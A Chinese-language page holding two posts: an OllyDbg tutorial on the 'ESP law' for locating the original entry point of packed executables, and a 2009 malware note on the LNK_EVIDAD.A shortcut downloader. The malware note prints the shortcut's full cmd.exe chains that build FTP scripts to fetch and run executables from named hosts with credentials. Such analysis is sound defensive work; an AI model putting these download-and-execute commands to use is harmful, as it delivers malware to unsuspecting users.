  ESP定律的原理就是“堆疊平衡”原理。
讓我們來到程式的入口處看看吧!
  1.這個是加了UPX殼的入口時各個寄存器的值!
EAX 00000000
ECX 0012FFB0
EDX 7FFE0304
EBX 7FFDF000
ESP 0012FFC4
EBP 0012FFF0
ESI 77F51778 ntdll.77F51778
EDI 77F517E6 ntdll.77F517E6
EIP 0040EC90 note-upx.<ModuleEntryPoint>
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 1  FS 0038 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_MOD_NOT_FOUND (0000007E)

  2.這個是UPX殼JMP到OEP後的寄存器的值!
EAX 00000000
ECX 0012FFB0
EDX 7FFE0304
EBX 7FFDF000
ESP 0012FFC4
EBP 0012FFF0
ESI 77F51778 ntdll.77F51778
EDI 77F517E6 ntdll.77F517E6
EIP 004010CC note-upx.004010CC
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 0038 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_MOD_NOT_FOUND (0000007E)

呵呵~是不是除了EIP不同以外,其他都一模一樣啊!

為什麼會這樣呢?
我們來看看UPX的殼的第一行:

0040EC90 n>  60               pushad      //****注意這裏*****
0040EC91     BE 15B04000      mov esi,note-upx.0040B015
PUSHAD就是把所有寄存器壓棧!我們在到殼的最後看看:

0040EE0F     61               popad      //****注意這裏*****
0040EE10   - E9 B722FFFF      jmp note-upx.004010CC   //JMP到OEP

POP就是將所有寄存器出棧!

而當我們PUSHAD的時候,ESP將寄存器壓入了0012FFC0–0012FFA4的堆疊中!如下:

0012FFA4   77F517E6  返回到 ntdll.77F517E6 來自 ntdll.77F78C4E           //EDI
0012FFA8   77F51778  返回到 ntdll.77F51778 來自 ntdll.77F517B5          //ESI
0012FFAC   0012FFF0                                                    //EBP
0012FFB0   0012FFC4                                                   //ESP
0012FFB4   7FFDF000                                                  //EBX
0012FFB8   7FFE0304                                                 //EDX
0012FFBC   0012FFB0                                                //ECX
0012FFC0   00000000                                               //EAX

所以這個時候,在教程上面就告訴我們對ESP的0012FFA4下硬體訪問中斷點。也就是說當程式要訪問這些堆疊,從而恢復原來寄存器的值,準備跳向苦苦尋覓的OEP的時候,OD幫助我們中斷下來。

於是我們停在0040EE10這一行!
總結:我們可以把殼假設為一個子程式,當殼把代碼解壓前和解壓後,他必須要做的是遵循堆疊平衡的原理,讓ESP執行到OEP的時候,使ESP=0012FFC4。

4.廣義ESP定律

很多人看完了教程就會問:ESP定律是不是就是0012FFA4,ESP定律的適用範圍是不是只能是壓縮殼!
我的回答是:NO!

看完了上面你就知道你如果用0012FFA8也是可以的,ESP定律不僅用於壓縮殼他也可以用於加密殼!!!

首先,告訴你一條經驗也是事實—當PE檔運行開始的時候,也就是進入殼的第一行代碼的時候。寄存器的值總是上面的那些值,不信你自己去試試!而當到達OEP後,絕大多的程式都第一句都是壓棧!(除了BC編寫的程式,BC一般是在下面幾句壓棧)

現在,根據上面的ESP原理,我們知道多數殼在運行到OEP的時候ESP=0012FFC4。這就是說程式的第一句是對0012FFC0進行寫入操作!
最後我們得到了廣義的ESP定律,對只要在0012FFC0下,硬體寫入中斷點,我們就能停在OEP的第二句處!!

下面我們來舉個例子,就脫殼進階第一篇吧!

載入OD後,來到這裏:

0040D042 N>  B8 00D04000      mov eax,Notepad.0040D000 //停在這裏
0040D047     68 4C584000      push Notepad.0040584C
0040D04C     64:FF35 00000000 push dword ptr fs:[0]    //第一次硬體中斷,F9
0040D053     64:8925 00000000 mov dword ptr fs:[0],esp
0040D05A     66:9C            pushfw
0040D05C     60               pushad
0040D05D     50               push eax

直接對0012FFC0下硬體寫入中斷點,F9運行。(注意硬體中斷)

在0040D04C第一次硬體中斷,F9繼續!

0040D135     A4               movs byte ptr es:[edi],byte ptr ds:[esi] //訪問異常,不管他 shift+F9繼續
0040D136     33C9             xor ecx,ecx
0040D138     83FB 00          cmp ebx,0
0040D13B   ^ 7E A4            jle short Notepad.0040D0E1

第二次硬體中斷。

004058B5       64             db 64                                 //斷在這裏
004058B6       89             db 89
004058B7       1D             db 1D
004058B8       00             db 00
004058B9       00             db 00

這裏也不是,F9繼續!

004010CC   /.  55             push ebp
004010CD   |.  8BEC           mov ebp,esp  //斷在這裏,哈哈,到了!(如果發現有花指令,用ctrl+A分析一下就能顯示出來)
004010CF   |.  83EC 44        sub esp,44
004010D2   |.  56             push esi

快吧!還不過癮,在來一個例子。

脫殼進階第二篇

如果按上面的方法斷不下來,程式直接運行了!沒什麼,我們在用另一種方法!
載入後停在這裏,用插件把OD隱藏!

0040DBD6 N>^\E9 25E4FFFF      jmp Note_tEl.0040C000                  //停在這裏
0040DBDB     0000             add byte ptr ds:[eax],al
0040DBDD     0038             add byte ptr ds:[eax],bh
0040DBDF     A4               movs byte ptr es:[edi],byte ptr ds:[esi]
0040DBE0     54               push esp

   F9運行,然後用SHIFT+F9跳過異常來到這裏:

0040D817   ^\73 DC            jnb short Note_tEl.0040D7F5       //到這裏
0040D819     CD20 64678F06    vxdcall 68F6764
0040D81F     0000             add byte ptr ds:[eax],al
0040D821     58               pop eax

在這裏對0012FFC0下硬體寫入中斷點!(命令行裏鍵入HW 12FFC0)SHIFT+F9跳過異常,就來到OEP的第二行處:(用CTRL+A分析一下)

004010CC   /.  55             push ebp
004010CD   |.  8BEC           mov ebp,esp                       //斷在這裏
004010CF   |.  83EC 44        sub esp,44
004010D2   |.  56             push esi
004010D3   |.  FF15 E4634000  call dword ptr ds:[4063E4]
004010D9   |.  8BF0           mov esi,eax
004010DB   |.  8A00           mov al,byte ptr ds:[eax]
004010DD   |.  3C 22          cmp al,22

就這樣我們輕鬆搞定了兩個加密殼的找OEP問題!

5.總結

現在我們可以輕鬆的回答一些問題了。
  1.ESP定律的原理是什麼?

堆疊平衡原理。
  2.ESP定律的適用範圍是什麼?

幾乎全部的壓縮殼,部分加密殼。只要是在JMP到OEP後,ESP=0012FFC4的殼,理論上我們都可以使用。但是在何時下中斷點避開校驗,何時下斷OD才能斷下來,這還需要多多總結和多多積累。歡迎你將你的經驗和我們分享。

  3.是不是只能下斷12FFA4的訪問中斷點?

當然不是,那只是ESP定律的一個體現,我們運用的是ESP定律的原理,而不應該是他的具體數值,不能說12FFA4,或者12FFC0就是ESP定律,他們只是ESP定律的一個應用罷了!

  4.對於STOLEN CODE我們怎麼辦?

哈哈,這正是尋找STOLEN CODE最好的辦法!當我們斷下時,正好斷在了殼處理STOLEN CODE的地方,在F8一會就到OEP了!

 文章標籤>> ESP定律

#

Saturday, March 14, 2009

LNK_EVIDAD.A

近來在電子郵件中頗為流行的 Windows捷徑惡意下載程式 (Windows Shortcut Script Downloader),跟 .scr、.cmd 惡意程式類似,常見以 .lnk 格式夾帶於郵件附件檔中,欺騙使用者下載後點選執行。

使用者執行後,LNK 惡意程式會以 ftp 連結至惡意程式下載站下載並執行多個程式來完成整個惡意程式植入流程,常見會下載 *.vbs、*.bat、*.exe 等程式。下載指令範例如下:

%windir%system32cmd.exe /c echo ftp -s:x.r > wsx.bat&echo lin.exe >> wsx.bat&echo del</STATE /></PLACE /> x.r >> wsx.bat&echo open 202.153.172.34 > x.r&echo yak01>>x.r&echo as1213>>x.r&echo recv lin.exe >> x.r&echo bye >> x.r&wsx.bat&

 

LNK_EVIDAD.A

%windir%\system32\cmd.exe /c

echo set bf=f > hw.bat
echo %bf%ftp -s:qat.d >> hw.bat
echo c.exe >> hw.bat
echo del qat.d >> hw.bat
echo open www.as08.com > qat.d
echo as08 >> qat.d
echo recv c.exe >> qat.d
echo bye >> qat.d
hw.bat

system32\shimgvw.dll
www.as08.com 202.153.172.34

%windir%\system32\cmd.exe /c

echo o web.g03z.com> l
echo aa33 >> l
echo bb33 >> l
echo set s=echo ge> s.bat
echo set f=t >>s .bat
echo %s%t pnf pnf.vbs^>^>l>>s.bat
echo bye ^>^>l>>s.bat
echo f%f%p -s:l>>s.bat
call s.bat
start pnf.vbs
del l s.bat

web.g03z.com 202.153.172.67

執行後會最小化視窗,並使用小字型:大部份的 LNK 惡意程式都會在執行後最小化執行視窗,同時將視窗內文字設為小字型來逃避使用者的注意。(圖六)